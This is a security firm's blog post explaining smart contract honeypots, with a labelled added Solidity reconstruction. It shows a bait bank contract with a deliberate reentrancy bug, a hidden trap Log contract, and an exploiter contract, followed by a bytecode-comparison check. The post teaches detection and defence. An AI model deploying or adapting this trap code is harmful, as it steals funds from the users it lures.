FYEO’s security team has partnered with TruGard to bring security insights to Web3. This is the first in a series of collaborative posts between the two security companies.
TruGard is a real-time cybersecurity and threat-intelligence startup focused on bringing safety and security to Web3 users and developers around the world. Combining state-of-the-art ML/AI with proven security techniques, practices and procedures, TruGard delivers safety insights for both retail and enterprise use cases. Through its API, customers who need enhanced due diligence and greater confidence in a transaction can keep their users from making potentially costly or risky transactions. FYEO's team of code auditors manually checks many of the riskiest flagged transactions to verify the reported vulnerabilities, helping raise the security profile of the entire industry. In this first blog post we examine honeypots.
Beware of Smart Contract Honeypots
In the dynamic world of blockchain and cryptocurrencies, security is paramount. One of the more insidious threats in this space is the smart contract honeypot: a trap designed to look like a lucrative opportunity that ends up ensnaring the user who takes the bait. Recently TruGard, an AI contract analyst, has detected numerous honeypots across EVM-based chains such as Binance Smart Chain, Polygon, Base and Arbitrum, highlighting the need for vigilance in the crypto space. To ensure the accuracy of these findings, FYEO has manually verified many of the vulnerabilities and honeypots identified by TruGard, underscoring the critical need for reliable security measures.
What is a Smart Contract Honeypot?
Imagine finding what appears to be a wallet full of cash left unattended on the street. You might be tempted to pick it up, thinking you've just come across free money. But what if, as soon as you touch the wallet, a trap springs, and you lose all the money in your own wallet? This is essentially how a smart contract honeypot works in the digital realm.
A smart contract honeypot is a malicious contract designed to lure people in by appearing to have a vulnerability that lets anyone extract funds from it. The would-be exploiter, thinking they have found easy money, sends ether (ETH) to interact with the contract. Instead of reaping a reward, they trigger hidden logic in the contract that locks their funds or hands them to the attacker. The exploiter becomes the exploited.
How Do Honeypots Trap Users?
Honeypots exploit the greed of users looking for exploitable contracts. Here’s a simplified version of how it often works:
Bait: The honeypot contract appears to have a flaw. This might look like a misconfigured permission setting or a seemingly easy way to withdraw funds.
Interaction: The user, believing they've found an exploitable vulnerability, sends a small amount of ETH to interact with the contract.
Trap: The contract executes hidden code that either locks up the user’s funds or transfers them directly to the attacker’s wallet.
Loss: The user realizes too late that they’ve been tricked and their funds are gone.
The Role of TruGard in Detecting Honeypots
TruGard is an advanced AI contract analyst that has been instrumental in identifying such malicious contracts. By scanning networks like Binance Smart Chain, Polygon, Base and Arbitrum, TruGard has uncovered not just many honeypots but also contracts with other vulnerabilities. The tool analyzes contracts for vulnerabilities, suspicious patterns and hidden threats, providing an additional layer of security for the crypto community. With this dataset in hand, campaigns become easy to observe. A campaign is a long-running, coordinated sequence of events designed to extract assets from unsuspecting users. Correlating Web3 indicators of compromise with a time-ordered sequence of events lets researchers and investigators understand the true scope of honeypot activity, and more.
Below is an example of one such honeypot campaign that has been running unchallenged for over a year.
What Does a Honeypot Look Like?
A honeypot smart contract might pretend to have a reentrancy vulnerability that appears to let an attacker withdraw all the ether in the contract. Secretly, however, it contains a trap:
When you deposit money, everything works as expected, and your deposit is recorded.
When you try to withdraw money, the contract checks hidden rules. If you don't meet these hidden rules (which you never will), your withdrawal fails.
This way, the contract keeps your deposited money, and you can't get it back, effectively stealing your funds if you try to exploit or use it.
These hidden rules can live in a linked contract whose deployed code diverges from the source presented alongside the main contract. The rule can be as simple as a revert, which is enough to make a clever honeypot that traps the funds of would-be exploiters.
Imagine the creator publishes the source on a public explorer such as Etherscan, where anyone can read it. The code has an obvious reentrancy bug in the Withdraw function, which makes it look easy to exploit. A would-be attacker might think they can take advantage of it by writing a contract that deposits 1 ether and then re-enters Withdraw repeatedly to drain the contract's funds.
However, the code shown there isn't the whole story. The Log contract actually deployed at the address the bank uses differs from the one in the published source. The creator added a single line to the deployed version of the AddMessage function that reverts the transaction whenever anyone other than the creator tries to withdraw. Because the revert happens in the Log contract rather than in the bank, a reader who studies only the bank's verified source never sees it. So while the code looks vulnerable and tempting, it traps anyone who tries to exploit it.
Here's a simplified version of the contract:
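The simplified contract the post refers to is not reproduced on this page. What follows is an added reconstruction of the published-versus-deployed pattern described above, written for this edit rather than taken from the original post: only the names Withdraw, Log and AddMessage come from the text; PrivateBank, Deposit, MinDeposit, TrapLog, Exploiter and the exact form of the owner check are assumptions made for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added reconstruction of the pattern described in the text, not the contract
// from the original post. Only the names Withdraw, Log and AddMessage come from
// the text; PrivateBank, Deposit, MinDeposit, TrapLog, Exploiter and the exact
// form of the owner check are assumptions made for illustration.

// The Log contract as it appears in the published source: it only records
// messages, so nothing in it could ever block a withdrawal.
contract Log {
    struct Message { address sender; string data; uint256 val; uint256 time; }
    Message[] public history;

    function AddMessage(address _adr, uint256 _val, string memory _data) public {
        history.push(Message(_adr, _data, _val, block.timestamp));
    }
}

// What is actually deployed at the address the bank talks to. Same ABI as Log,
// plus one hidden line: a withdrawal logged for anyone but the creator reverts.
contract TrapLog {
    struct Message { address sender; string data; uint256 val; uint256 time; }
    Message[] public history;
    address private owner;

    constructor() { owner = msg.sender; }

    function AddMessage(address _adr, uint256 _val, string memory _data) public {
        if (keccak256(bytes(_data)) == keccak256("Withdraw") && _adr != owner) {
            revert(); // the secret rule: nobody but the creator is ever paid
        }
        history.push(Message(_adr, _data, _val, block.timestamp));
    }
}

// The bait. Withdraw pays out before it updates the balance, a textbook
// reentrancy bug, so the contract looks drainable to anyone who reads it.
contract PrivateBank {
    mapping(address => uint256) public balances;
    uint256 public constant MinDeposit = 1 ether;
    Log public TransferLog;

    // The published source reads as if an ordinary Log is wired in; the live
    // instance was constructed with TrapLog's address. Solidity checks only
    // the ABI of `Log`, never the code that actually sits at that address.
    constructor(address _log) { TransferLog = Log(_log); }

    function Deposit() public payable {
        if (msg.value >= MinDeposit) {
            balances[msg.sender] += msg.value;
            TransferLog.AddMessage(msg.sender, msg.value, "Deposit"); // passes in TrapLog too
        }
    }

    function Withdraw(uint256 _am) public {
        if (_am <= balances[msg.sender]) {
            (bool ok, ) = msg.sender.call{value: _am}(""); // external call first...
            if (ok) {
                // ...state update afterwards. `unchecked` mirrors the pre-0.8
                // contracts these honeypots copy, which is what makes re-entry
                // look profitable to a reader.
                unchecked { balances[msg.sender] -= _am; }
                // Reverts inside TrapLog for everyone except the creator.
                TransferLog.AddMessage(msg.sender, _am, "Withdraw");
            }
        }
    }
}

// What a would-be exploiter deploys: fund the bank in one transaction, then
// try to drain it by re-entering Withdraw from receive() in a later one.
contract Exploiter {
    PrivateBank private bank;
    uint256 private amount;
    bool private reentered;

    constructor(PrivateBank _bank) { bank = _bank; }

    function deposit() external payable {
        amount = msg.value;
        bank.Deposit{value: msg.value}(); // succeeds: the deposit is now stuck
    }

    function drain() external {
        reentered = false;
        bank.Withdraw(amount);
        // Trace: Withdraw pays us -> receive() re-enters Withdraw -> whichever
        // Withdraw last handed over ether reaches TrapLog.AddMessage and
        // reverts, undoing that transfer; an outer low-level call then only
        // sees ok == false. Either the whole call reverts or it returns having
        // paid nothing. In no case does ether leave the bank.
    }

    receive() external payable {
        if (!reentered) {
            reentered = true;
            bank.Withdraw(amount);
        }
    }
}
```

The practical check this suggests: before sending anything, read the address stored in the bank's public TransferLog variable, fetch the bytecode actually deployed there with the eth_getCode JSON-RPC method, and compare it with what the Log source in the verified listing compiles to. A mismatch, or an unverified contract at that address, is the honeypot signal. Note that the trap lives entirely outside the bank contract, which is why analysis of the bank's verified source alone never finds it.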
Staying Safe in the Crypto Space
To protect yourself from honeypots and other scams:
Be Skeptical: If something seems too good to be true, it probably is. Always question unusually lucrative opportunities.
Research: Before interacting with any contract, do thorough research. Look for audits and reviews of the contract.
Use Trusted Tools: Leverage tools like TruGard and FYEO Ygent to analyze contracts and websites before engaging with them.
Stay Updated: The crypto landscape is ever-evolving. Keep abreast of the latest security threats and best practices.
In conclusion, while smart contract honeypots are a sophisticated and dangerous form of scam, being aware of their existence and employing robust security measures can help you navigate the crypto world safely. Trust in tools like TruGard and FYEO's decentralized password manager, KryptPass, to keep your investments secure and always stay vigilant.